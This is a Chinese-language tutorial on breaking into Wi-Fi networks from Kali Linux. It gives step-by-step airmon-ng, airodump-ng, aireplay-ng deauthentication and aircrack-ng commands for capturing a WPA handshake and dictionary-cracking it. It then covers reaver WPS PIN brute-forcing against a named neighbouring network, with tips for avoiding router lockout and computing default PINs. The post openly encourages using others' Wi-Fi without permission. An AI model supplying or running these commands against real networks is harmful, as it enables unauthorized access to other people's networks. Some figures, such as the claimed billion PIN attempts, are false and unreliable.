量子哈希工具:1:笔记本 2:USB无线网卡(必备) 3:kali系统 4:靠谱字典
第一种方法:暴力破解法
暴力破解是一种逐个尝试密码的方法,直到找到正确的密码为止。现在的Wi-Fi加密通常有以下几种方式:1、不启用安全 2、WEP 3、WPA/WPA2-PSK(预共享密钥) 4、WPA/WPA2 802.1X(radius认证)
下面进入正题:
第一步:在kali启动终端输入以下命令,查看网卡信息:
root@kali:~# airmon-ng
第二步:输入以下命令,启动监听窗口:
airmon-ng start wlan0
第三步:输入以下命令,扫描Wi-Fi信号:
airodump-ng mon0
这里我以自己家的Wi-Fi为例进行实验。
第四步:这是我家的Wi-Fi信息:
根据上图可以看出,BSSID是00:0F:32:A0:99:DC,信道(CH)是1。
输入以下命令:
airodump-ng -w freedom -c CH –bssid 00:0F:32:A0:99:DC mon0 –ignore-negative-one
解释:CH表示信道,信道填写对应的数字,freedom是抓握手包的文件名,系统会自动生成一个freedom.cap的文件,文件名可以自行更改。
00:0F:32:A0:99:DC是路由器的MAC地址,64:5A:04:BB:54:57是客户端的MAC地址。
第五步:重新开启一个客户端,输入以下命令:
aireplay-ng –deauth 10 -a 00:0F:32:A0:99:DC -c 64:5A:04:BB:54:57 mon0 –ignore-negative-one
这样客户端会掉线,当我们重新连接时,就会抓到握手包。
第六步:破解握手包,命令如下:
aircrack-ng -w mi freedom-*.cap
解释:mi是字典的名称,freedom-*.cap是握手包的文件名,abc123abc是我的Wi-Fi密码。
破解完成,成功与否取决于字典的强大和运气,祝大家蹭网愉快!
第二种方法:通过PIN码破解
这个方法非常简单:
第一步:使用Wash扫描开启WPS的网络。
wash -i mon1 –C
如果周围没有开启WPS功能的Wi-Fi,会出现上图的情况。这时怎么办呢?不要着急,因为有些Wi-Fi隐藏了WPS功能,我们可以直接尝试。
使用前面扫描Wi-Fi的命令:
airodump-ng mon0
如果看到我圈出来的MAC地址,选择一个PWR值的绝对值小于70的Wi-Fi进行破解。
第二步:我选择了名为FAST_F70E的Wi-Fi进行破解。
命令如下:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv
E4:D3:32:7F:F7:0E是根据路由器的MAC地址更改的,我破解的Wi-Fi的MAC地址是E4:D3:32:7F:F7:0E。
如果出现上图的情况,表示可以破解,如果不能破解,则尝试其他Wi-Fi进行破解。
这样就完成了破解。
小知识:如果密码被更改,但你知道Wi-Fi的PIN码,可以使用以下命令:
reaver -i mon0 -b MAC -p PIN
PIN码有8位,所以要尝试1000000000次。
但是有些路由器对PIN码有限制,比如必须开启WPS功能,或者限制在300秒内尝试PIN码。
有些路由器的PIN码可以通过计算得到,例如腾达和磊科的产品,如果路由器的MAC地址以“C83A35”或“00B00C”开头,可以直接计算出PIN值。
例如:bssid:Tenda_579A18,MAC地址:C8:3A:35:57:9A:18,通过计算器将MAC地址的后6位转换为十进制数,得到5741080(PIN码的前7位),最多尝试10次或使用软件获取路由器的PIN码。
在破解时,推荐使用以下命令:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S –d9 –t9 -vv
因为参数–d9 –t9可以防止路由器被PIN码锁死。
全文到此结束
